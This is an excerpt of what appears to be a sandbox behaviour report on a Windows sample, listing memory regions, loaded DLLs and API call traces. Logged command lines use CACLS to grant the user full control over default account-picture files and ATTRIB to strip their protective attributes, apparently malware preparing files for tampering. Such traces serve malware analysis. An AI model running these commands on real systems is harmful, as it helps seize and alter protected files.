pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27355 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27356 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27357 start_va = 0x1c0000 end_va = 0x1c8fff entry_point = 0x1c0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27358 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27359 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27360 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27361 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27362 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27363 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27364 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27365 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 
(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27366 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 27367 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 27368 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27369 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27370 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27371 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27372 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27373 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27374 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 575 os_tid = 0x9c4 Thread: id = 576 os_tid = 0x130 Process: id = "405" image_name = 
"attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "403" os_parent_pid = "0x84c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27376 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27378 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27379 start_va = 0x980000 end_va = 0x986fff entry_point = 0x980000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27380 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27381 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" 
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27382 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27383 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27384 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27385 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27386 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27387 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27388 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 27389 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 27390 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27391 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27392 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 
"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27393 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27394 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27395 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27396 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27397 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27398 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27399 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27400 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27401 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27402 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 27403 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27404 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 577 os_tid = 0x7f4 Process: id = "406" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x9c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27405 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27406 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = 
"" Region: id = 27407 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27408 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 27409 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27410 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27411 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27412 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27413 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27414 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27415 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27416 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27417 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 27418 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = 
mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27419 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 27420 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27421 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27422 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27423 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27424 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27425 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27426 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27427 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = 
"gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27428 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27429 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 27430 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27431 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27432 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 27433 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 27434 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 27435 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27436 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 27437 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 27438 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 27439 start_va = 0x1270000 end_va = 0x153efff 
entry_point = 0x1270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 578 os_tid = 0x508 [0188.607] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa8c | out: lpSystemTimeAsFileTime=0x1afa8c*(dwLowDateTime=0xa5521e20, dwHighDateTime=0x1d440a9)) [0188.607] GetCurrentProcessId () returned 0x9c8 [0188.607] GetCurrentThreadId () returned 0x508 [0188.607] GetTickCount () returned 0x35caf [0188.607] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa84 | out: lpPerformanceCount=0x1afa84*=24539653435) returned 1 [0188.608] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0188.608] __set_app_type (_Type=0x1) [0188.608] __p__fmode () returned 0x76b331f4 [0188.608] __p__commode () returned 0x76b331fc [0188.608] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0188.608] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0188.608] GetCurrentThreadId () returned 0x508 [0188.608] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x508) returned 0x38 [0188.608] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.608] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0188.608] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.609] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0188.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa1c | out: phkResult=0x1afa1c*=0x0) returned 0x2 [0188.609] VirtualQuery (in: lpAddress=0x1afa53, lpBuffer=0x1af9ec, dwLength=0x1c | out: 
lpBuffer=0x1af9ec*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.609] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af9ec, dwLength=0x1c | out: lpBuffer=0x1af9ec*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0188.609] GetConsoleOutputCP () returned 0x1b5 [0188.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.609] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0188.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.609] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0188.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.609] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.609] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.609] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.610] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.610] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.610] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0188.610] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0188.610] GetEnvironmentStringsW () returned 0x300308* [0188.610] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.610] GetEnvironmentStringsW () returned 0x300308* [0188.610] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.610] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae98c | out: phkResult=0x1ae98c*=0x40) returned 0x0 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0xb8, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x0, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.610] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] 
RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.611] RegCloseKey (hKey=0x40) returned 0x0 [0188.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae98c | out: phkResult=0x1ae98c*=0x40) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x40, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x1, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x0, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x9, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x4, lpData=0x1ae998*=0x9, lpcbData=0x1ae990*=0x4) returned 0x0 [0188.611] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x1ae994, lpData=0x1ae998, lpcbData=0x1ae990*=0x1000 | out: lpType=0x1ae994*=0x0, lpData=0x1ae998*=0x9, lpcbData=0x1ae990*=0x1000) returned 0x2 [0188.611] RegCloseKey (hKey=0x40) returned 0x0 [0188.611] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886396 [0188.611] srand (_Seed=0x5b886396) [0188.611] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" [0188.611] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" [0188.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.611] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0188.612] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.612] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.612] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.612] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0188.612] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0188.612] _wcsicmp (_String1="PROMPT", 
